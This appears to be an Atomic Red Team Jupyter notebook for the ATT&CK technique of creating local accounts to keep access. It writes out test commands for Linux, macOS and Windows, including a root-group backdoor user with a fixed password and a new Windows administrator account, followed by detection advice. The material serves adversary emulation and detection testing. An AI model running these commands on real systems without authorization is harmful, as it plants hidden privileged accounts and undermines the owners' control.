{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1136.001 - Create Account: Local Account",
    "\n",
    "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the <code>net user /add</code> command can be used to create a local account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - Create a user account on a Linux system\nCreate a user via useradd\n\n**Supported Platforms:** linux\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `bash`\n```bash\nuseradd -M -N -r -s /bin/bash -c evil_account evil_user\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1136.001 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - Create a user account on a MacOS system\nCreates a user on a MacOS system with dscl\n\n**Supported Platforms:** macos\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `bash`\n```bash\ndscl . -create /Users/evil_user\ndscl . -create /Users/evil_user UserShell /bin/zsh\ndscl . -create /Users/evil_user RealName \"Evil Account\"\ndscl . -create /Users/evil_user UniqueID \"1010\"\ndscl . -create /Users/evil_user PrimaryGroupID 80\ndscl . -create /Users/evil_user NFSHomeDirectory /Users/evil_user\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1136.001 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - Create a new user in a command prompt\nCreates a new user in a command prompt. Upon execution, \"The command completed successfully.\" will be displayed. To verify the\nnew account, run \"net user\" in powershell or CMD and observe that there is a new user named \"T1136.001_CMD\"\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nnet user /add \"T1136.001_CMD\" \"T1136.001_CMD!\"\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1136.001 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #4 - Create a new user in PowerShell\nCreates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the\nnew account, run \"net user\" in powershell or CMD and observe that there is a new user named \"T1136.001_PowerShell\"\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `powershell`\n```powershell\nNew-LocalUser -Name \"T1136.001_PowerShell\" -NoPassword\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1136.001 -TestNumbers 4"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #5 - Create a new user in Linux with `root` UID and GID.\nCreates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.\n\n**Supported Platforms:** linux\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `bash`\n```bash\nuseradd -g 0 -M -d /root -s /bin/bash butter\nif [ $(cat /etc/os-release | grep -i 'Name=\"ubuntu\"') ]; then echo \"butter:BetterWithButter\" | sudo chpasswd; else echo \"BetterWithButter\" | passwd --stdin butter; fi;\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1136.001 -TestNumbers 5"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #6 - Create a new Windows admin user\nCreates a new admin user in a command prompt.\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nnet user /add \"T1136.001_Admin\" \"T1136_pass\"\nnet localgroup administrators \"T1136.001_Admin\" /add\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1136.001 -TestNumbers 6"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Monitor for processes and command-line parameters associated with local account creation, such as <code>net user /add</code> or <code>useradd</code>. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}